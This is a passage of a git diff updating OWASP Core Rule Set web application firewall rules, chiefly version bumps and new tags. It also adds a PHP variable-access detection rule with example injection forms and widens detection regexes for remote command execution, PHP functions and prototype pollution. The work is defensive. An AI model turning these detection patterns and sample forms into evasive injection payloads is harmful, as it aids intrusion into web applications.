[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))" \
     "id:932238,\
     phase:2,\
     block,\
@@ -1684,9 +1753,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1711,7 +1781,7 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,t:normalizePath,t:cmdLine,\
+    t:none,t:normalizePath,t:cmdLine,\
     msg:'Remote Command Execution: Wildcard bypass technique attempt',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -1720,9 +1790,10 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1754,9 +1825,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1787,9 +1859,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1820,9 +1893,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1853,16 +1927,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
index 2af7d0a4a..3376f9c61 100644
--- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -58,8 +58,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -99,8 +100,9 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -123,13 +125,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.933120_matched_var=%{MATCHED_VAR}',\
     setvar:'tx.933120_matched_var_name=%{MATCHED_VAR_NAME}',\
     chain"
-    SecRule MATCHED_VARS "@rx \b([^\s]+)\s*=" \
+    SecRule MATCHED_VARS "@rx \b([^\s]+)\s*=[^=]" \
         "capture,\
         chain"
         SecRule TX:1 "@pmFromFile php-config-directives.data" \
@@ -154,13 +157,46 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
+#
+# [ PHP Variables ]
+#
+# Prevent accessing PHP variables using these methods:
+# ${'VARIABLE_NAME'}
+# $ {"VARIABLE_NAME"}
+# $ {'_VAR'.'IABLE_NAME'}
+# $     {   $var}
+# $     {   CONSTANT   }
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$\s*\{\s*\S[^\{\}]*\}" \
+    "id:933135,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,\
+    msg:'PHP Injection Attack: Variable Access Found',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-php',\
+    tag:'platform-multi',\
+    tag:'attack-injection-php',\
+    tag:'paranoia-level/1',\
+    tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
+    tag:'capec/1000/152/242',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
 #
 # [ PHP I/O Streams ]
 #
@@ -190,8 +226,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -226,8 +263,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -293,8 +331,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -331,7 +370,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 933160
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\(.*\)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|rev)|r(?:eadfile|trim)|s(?:t(?:rip_tags|at)|ubstr|ystem)|tmpfile|u(?:n(?:pac|lin)k|sort))(?:/(?:\*.*\*/|/.*)|#.*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\([^\)]*\)" \
     "id:933160,\
     phase:2,\
     block,\
@@ -345,8 +384,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -400,8 +440,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -455,8 +496,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -502,14 +544,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -545,13 +588,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.933151_matched_var=%{MATCHED_VAR}',\
     setvar:'tx.933151_matched_var_name=%{MATCHED_VAR_NAME}',\
     chain"
-    SecRule MATCHED_VARS "@rx \b([^\s]+)\s*[(]" \
+    SecRule MATCHED_VARS "@rx \b([^\s]+)\s*\(" \
         "capture,\
         chain"
         SecRule TX:1 "@pmFromFile php-function-names-933151.data" \
@@ -561,8 +605,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -603,8 +647,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -647,8 +692,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -689,8 +735,9 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'attack-injection-php',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -718,8 +765,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-php',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -753,15 +801,16 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-injection-php',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-PHP',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
index 51625e23a..cddcecb02 100644
--- a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+++ b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -64,8 +64,9 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-injection-generic',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -99,8 +100,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-ssrf',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/225/664',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -117,9 +119,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 # See also: https://cwe.mitre.org/data/definitions/1321.html
 #
 # Note: only server-based (not DOM-based) attacks are covered here.
-# Stricter sibling: 934131
 
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\[)\s*prototype)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\]?\[)\s*prototype)" \
     "id:934130,\
     phase:2,\
     block,\
